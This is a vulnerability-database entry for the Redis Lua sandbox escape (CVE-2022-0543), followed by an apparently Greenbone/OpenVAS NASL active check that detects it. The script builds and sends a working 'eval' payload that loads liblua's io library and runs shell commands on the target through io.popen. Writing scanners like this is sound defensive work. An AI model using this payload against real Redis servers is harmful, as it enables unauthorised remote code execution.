CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score: 9.9 High
Confidence: High

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.971 High
Percentile: 99.8%

Redis is prone to a remote code execution (RCE) vulnerability.
# Copyright (C) 2022 Greenbone Networks GmbH
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
CPE = "cpe:/a:redis:redis";
if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.148029");
  script_version("2022-08-09T10:11:17+0000");
  script_tag(name:"last_modification", value:"2022-08-09 10:11:17 +0000 (Tue, 09 Aug 2022)");
  script_tag(name:"creation_date", value:"2022-05-03 04:18:25 +0000 (Tue, 03 May 2022)");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");

  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2022-03-09 02:03:00 +0000 (Wed, 09 Mar 2022)");

  script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
  script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");

  script_cve_id("CVE-2022-0543");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Redis RCE Vulnerability (CVE-2022-0543) - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2022 Greenbone Networks GmbH");
  script_family("Databases");
  script_dependencies("gb_redis_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("redis/installed", "Host/runs_unixoide");
  script_require_ports("Services/redis", 6379);

  script_tag(name:"summary", value:"Redis is prone to a remote code execution (RCE) vulnerability.");

  script_tag(name:"insight", value:"It was discovered, that redis, a persistent key-value database,
  due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result
  in remote code execution.");

  script_tag(name:"affected", value:"Redis on Debian and Debian-based systems like Ubuntu.");

  script_tag(name:"solution", value:"Update to the latest version from your distribution.");

  script_xref(name:"URL", value:"https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce");
  script_xref(name:"URL", value:"https://lists.debian.org/debian-security-announce/2022/msg00048.html");
  script_xref(name:"URL", value:"https://packetstormsecurity.com/files/166885/Redis-Lua-Sandbox-Escape.html");
  script_xref(name:"URL", value:"https://www.debian.org/security/2022/dsa-5081");
  script_xref(name:"URL", value:"https://ubuntu.com/security/notices/USN-5316-1");

  exit(0);
}

include("host_details.inc");
include("port_service_func.inc");
include("misc_func.inc");
include("os_func.inc");

port = service_get_port(default: 6379, proto: "redis");

soc = open_sock_tcp(port);
if (!soc)
  exit(0);

cmds = exploit_commands("linux");

# nb: File names taken from the following packages of buster and bullseye:
# - https://packages.debian.org/buster/liblua5.1-0
# - https://packages.debian.org/bullseye/liblua5.1-0
# File names are also the same on Ubuntu (checked on affected 20.04 and 21.10).
# Also note that "redis-tools" (which is a dependency of "redis-server") is having a dependency
# on "liblua5.1-0" on buster and bullseye so only the 5.1 file names (and not the 5.2 or 5.3 ones)
# are used in the list below.
libs = make_list("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0",
                 "/usr/lib/aarch64-linux-gnu/liblua5.1.so.0",
                 "/usr/lib/arm-linux-gnueabi/liblua5.1.so.0",
                 "/usr/lib/arm-linux-gnueabihf/liblua5.1.so.0",
                 "/usr/lib/i386-linux-gnu/liblua5.1.so.0",
                 "/usr/lib/mips-linux-gnu/liblua5.1.so.0", # nb: Only available on buster but not on bullseye
                 "/usr/lib/mips64el-linux-gnuabi64/liblua5.1.so.0",
                 "/usr/lib/mipsel-linux-gnu/liblua5.1.so.0",
                 "/usr/lib/powerpc64le-linux-gnu/liblua5.1.so.0",
                 "/usr/lib/s390x-linux-gnu/liblua5.1.so.0");

foreach pattern (keys(cmds)) {

  cmd = cmds[pattern];

  foreach lib (libs) {

    payload = "eval 'local io_l = " + 'package.loadlib("' + lib +'",' +
              ' "luaopen_io"); local io = io_l(); local f = io.popen("' + cmd + '", "r");' +
              ' local res = f:read("*a"); f:close();' + " return res' 0" + '\r\n';

    send(socket: soc, data: payload);
    res = recv(socket: soc, length: 512);

    if (egrep(pattern: pattern, string: res)) {
      close(soc);
      report = 'By doing the following request:\n\n' + payload + '\nit was possible to execute the "' + cmd + '" command.\n\nResult:\n\n' + chomp(res);
      security_message(port: port, data: report);
      exit(0);
    }
  }
}

close(soc);
exit(0); # Results depending on the architecture